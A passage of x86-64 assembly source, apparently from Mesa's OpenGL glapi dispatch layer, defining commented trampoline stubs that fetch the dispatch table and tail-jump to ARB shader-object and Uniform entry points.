popq %rdi
movq 4184(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DetachObjectARB), .-GL_PREFIX(DetachObjectARB)
/* glGetActiveUniformARB stub (6 integer args): tail-jump through the dispatch-table entry at byte offset 4192. */
.p2align 4,,15
.globl GL_PREFIX(GetActiveUniformARB)
.type GL_PREFIX(GetActiveUniformARB), @function
GL_PREFIX(GetActiveUniformARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4192(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save all six arg registers across the lookup call */
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4192(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4192(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4192(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetActiveUniformARB), .-GL_PREFIX(GetActiveUniformARB)
/* glGetAttachedObjectsARB stub: tail-jump through the dispatch-table entry at byte offset 4200. */
.p2align 4,,15
.globl GL_PREFIX(GetAttachedObjectsARB)
.type GL_PREFIX(GetAttachedObjectsARB), @function
GL_PREFIX(GetAttachedObjectsARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4200(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4200(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4200(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4200(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetAttachedObjectsARB), .-GL_PREFIX(GetAttachedObjectsARB)
/* glGetHandleARB stub: tail-jump through the dispatch-table entry at byte offset 4208. */
.p2align 4,,15
.globl GL_PREFIX(GetHandleARB)
.type GL_PREFIX(GetHandleARB), @function
GL_PREFIX(GetHandleARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4208(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save the lone arg register; one push also keeps %rsp 16-aligned */
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4208(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4208(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdi
movq 4208(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetHandleARB), .-GL_PREFIX(GetHandleARB)
/* glGetInfoLogARB stub: tail-jump through the dispatch-table entry at byte offset 4216. */
.p2align 4,,15
.globl GL_PREFIX(GetInfoLogARB)
.type GL_PREFIX(GetInfoLogARB), @function
GL_PREFIX(GetInfoLogARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4216(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4216(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4216(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4216(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetInfoLogARB), .-GL_PREFIX(GetInfoLogARB)
/* glGetObjectParameterfvARB stub: tail-jump through the dispatch-table entry at byte offset 4224. */
.p2align 4,,15
.globl GL_PREFIX(GetObjectParameterfvARB)
.type GL_PREFIX(GetObjectParameterfvARB), @function
GL_PREFIX(GetObjectParameterfvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4224(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4224(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4224(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4224(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetObjectParameterfvARB), .-GL_PREFIX(GetObjectParameterfvARB)
/* glGetObjectParameterivARB stub: tail-jump through the dispatch-table entry at byte offset 4232. */
.p2align 4,,15
.globl GL_PREFIX(GetObjectParameterivARB)
.type GL_PREFIX(GetObjectParameterivARB), @function
GL_PREFIX(GetObjectParameterivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4232(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4232(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4232(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4232(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetObjectParameterivARB), .-GL_PREFIX(GetObjectParameterivARB)
/* glGetShaderSourceARB stub: tail-jump through the dispatch-table entry at byte offset 4240. */
.p2align 4,,15
.globl GL_PREFIX(GetShaderSourceARB)
.type GL_PREFIX(GetShaderSourceARB), @function
GL_PREFIX(GetShaderSourceARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4240(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4240(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4240(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4240(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetShaderSourceARB), .-GL_PREFIX(GetShaderSourceARB)
/* glGetUniformLocationARB stub: tail-jump through the dispatch-table entry at byte offset 4248. */
.p2align 4,,15
.globl GL_PREFIX(GetUniformLocationARB)
.type GL_PREFIX(GetUniformLocationARB), @function
GL_PREFIX(GetUniformLocationARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4248(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4248(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4248(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rsi
popq %rdi
movq 4248(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetUniformLocationARB), .-GL_PREFIX(GetUniformLocationARB)
/* glGetUniformfvARB stub: tail-jump through the dispatch-table entry at byte offset 4256. */
.p2align 4,,15
.globl GL_PREFIX(GetUniformfvARB)
.type GL_PREFIX(GetUniformfvARB), @function
GL_PREFIX(GetUniformfvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4256(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4256(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4256(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4256(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetUniformfvARB), .-GL_PREFIX(GetUniformfvARB)
/* glGetUniformivARB stub: tail-jump through the dispatch-table entry at byte offset 4264. */
.p2align 4,,15
.globl GL_PREFIX(GetUniformivARB)
.type GL_PREFIX(GetUniformivARB), @function
GL_PREFIX(GetUniformivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4264(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4264(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4264(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4264(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetUniformivARB), .-GL_PREFIX(GetUniformivARB)
/* glLinkProgramARB stub: tail-jump through the dispatch-table entry at byte offset 4272. */
.p2align 4,,15
.globl GL_PREFIX(LinkProgramARB)
.type GL_PREFIX(LinkProgramARB), @function
GL_PREFIX(LinkProgramARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4272(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save the lone arg register; one push also keeps %rsp 16-aligned */
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4272(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4272(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdi
movq 4272(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LinkProgramARB), .-GL_PREFIX(LinkProgramARB)
/* glShaderSourceARB stub: tail-jump through the dispatch-table entry at byte offset 4280. */
.p2align 4,,15
.globl GL_PREFIX(ShaderSourceARB)
.type GL_PREFIX(ShaderSourceARB), @function
GL_PREFIX(ShaderSourceARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4280(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4280(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4280(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4280(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ShaderSourceARB), .-GL_PREFIX(ShaderSourceARB)
/* glUniform1fARB stub (int arg in %rdi, float arg in %xmm0):
   tail-jump through the dispatch-table entry at byte offset 4288. */
.p2align 4,,15
.globl GL_PREFIX(Uniform1fARB)
.type GL_PREFIX(Uniform1fARB), @function
GL_PREFIX(Uniform1fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4288(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp	/* spill slots for %rdi/%xmm0; 24 keeps %rsp 16-aligned at the call */
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4288(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4288(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4288(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform1fARB), .-GL_PREFIX(Uniform1fARB)
/* glUniform1fvARB stub: tail-jump through the dispatch-table entry at byte offset 4296. */
.p2align 4,,15
.globl GL_PREFIX(Uniform1fvARB)
.type GL_PREFIX(Uniform1fvARB), @function
GL_PREFIX(Uniform1fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4296(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4296(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4296(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4296(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform1fvARB), .-GL_PREFIX(Uniform1fvARB)
/* glUniform1iARB stub: tail-jump through the dispatch-table entry at byte offset 4304. */
.p2align 4,,15
.globl GL_PREFIX(Uniform1iARB)
.type GL_PREFIX(Uniform1iARB), @function
GL_PREFIX(Uniform1iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4304(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4304(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4304(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rsi
popq %rdi
movq 4304(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform1iARB), .-GL_PREFIX(Uniform1iARB)
/* glUniform1ivARB stub: tail-jump through the dispatch-table entry at byte offset 4312. */
.p2align 4,,15
.globl GL_PREFIX(Uniform1ivARB)
.type GL_PREFIX(Uniform1ivARB), @function
GL_PREFIX(Uniform1ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4312(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4312(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4312(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4312(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform1ivARB), .-GL_PREFIX(Uniform1ivARB)
/* glUniform2fARB stub (int arg in %rdi, float args in %xmm0/%xmm1):
   tail-jump through the dispatch-table entry at byte offset 4320. */
.p2align 4,,15
.globl GL_PREFIX(Uniform2fARB)
.type GL_PREFIX(Uniform2fARB), @function
GL_PREFIX(Uniform2fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4320(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp	/* spill slots for %rdi/%xmm0/%xmm1; 24 keeps %rsp 16-aligned at the call */
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4320(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4320(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4320(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform2fARB), .-GL_PREFIX(Uniform2fARB)
/* glUniform2fvARB stub: tail-jump through the dispatch-table entry at byte offset 4328. */
.p2align 4,,15
.globl GL_PREFIX(Uniform2fvARB)
.type GL_PREFIX(Uniform2fvARB), @function
GL_PREFIX(Uniform2fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4328(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4328(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4328(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4328(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform2fvARB), .-GL_PREFIX(Uniform2fvARB)
/* glUniform2iARB stub: tail-jump through the dispatch-table entry at byte offset 4336. */
.p2align 4,,15
.globl GL_PREFIX(Uniform2iARB)
.type GL_PREFIX(Uniform2iARB), @function
GL_PREFIX(Uniform2iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4336(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4336(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4336(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4336(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform2iARB), .-GL_PREFIX(Uniform2iARB)
/* glUniform2ivARB stub: tail-jump through the dispatch-table entry at byte offset 4344. */
.p2align 4,,15
.globl GL_PREFIX(Uniform2ivARB)
.type GL_PREFIX(Uniform2ivARB), @function
GL_PREFIX(Uniform2ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4344(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4344(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4344(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4344(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform2ivARB), .-GL_PREFIX(Uniform2ivARB)
/* glUniform3fARB stub (int arg in %rdi, float args in %xmm0-%xmm2):
   tail-jump through the dispatch-table entry at byte offset 4352. */
.p2align 4,,15
.globl GL_PREFIX(Uniform3fARB)
.type GL_PREFIX(Uniform3fARB), @function
GL_PREFIX(Uniform3fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4352(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp	/* spill slots for %rdi/%xmm0-2; 40 keeps %rsp 16-aligned at the call */
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 4352(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4352(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 4352(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform3fARB), .-GL_PREFIX(Uniform3fARB)
/* glUniform3fvARB stub: tail-jump through the dispatch-table entry at byte offset 4360. */
.p2align 4,,15
.globl GL_PREFIX(Uniform3fvARB)
.type GL_PREFIX(Uniform3fvARB), @function
GL_PREFIX(Uniform3fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4360(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4360(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4360(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4360(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform3fvARB), .-GL_PREFIX(Uniform3fvARB)
/* glUniform3iARB stub: tail-jump through the dispatch-table entry at byte offset 4368. */
.p2align 4,,15
.globl GL_PREFIX(Uniform3iARB)
.type GL_PREFIX(Uniform3iARB), @function
GL_PREFIX(Uniform3iARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4368(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call */
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp	/* pad only: realigns %rsp to 16 for the call */
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4368(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4368(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4368(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform3iARB), .-GL_PREFIX(Uniform3iARB)
/* glUniform3ivARB stub: tail-jump through the dispatch-table entry at byte offset 4376. */
.p2align 4,,15
.globl GL_PREFIX(Uniform3ivARB)
.type GL_PREFIX(Uniform3ivARB), @function
GL_PREFIX(Uniform3ivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4376(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi	/* save arg registers across the lookup call (3 pushes also keep %rsp 16-aligned) */
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4376(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4376(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
popq %rdx
popq %rsi
popq %rdi
movq 4376(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform3ivARB), .-GL_PREFIX(Uniform3ivARB)
/* glUniform4fARB stub (int arg in %rdi, float args in %xmm0-%xmm3):
   tail-jump through the dispatch-table entry at byte offset 4384. */
.p2align 4,,15
.globl GL_PREFIX(Uniform4fARB)
.type GL_PREFIX(Uniform4fARB), @function
GL_PREFIX(Uniform4fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4384(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp	/* spill slots for %rdi/%xmm0-3; 40 keeps %rsp 16-aligned at the call */
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _x86_64_get_dispatch@PLT
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 4384(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax	/* may be NULL before initialization */
testq %rax, %rax
je 1f
movq 4384(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _glapi_get_dispatch	/* slow path: initialize and fetch the table */
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 4384(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Uniform4fARB), .-GL_PREFIX(Uniform4fARB)
.p2align 4,,15
.globl GL_PREFIX(Uniform4fvARB)
.type GL_PREFIX(Uniform4fvARB), @function
GL_PREFIX(Uniform4fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4392(%rax), %r11
jmp *%r11
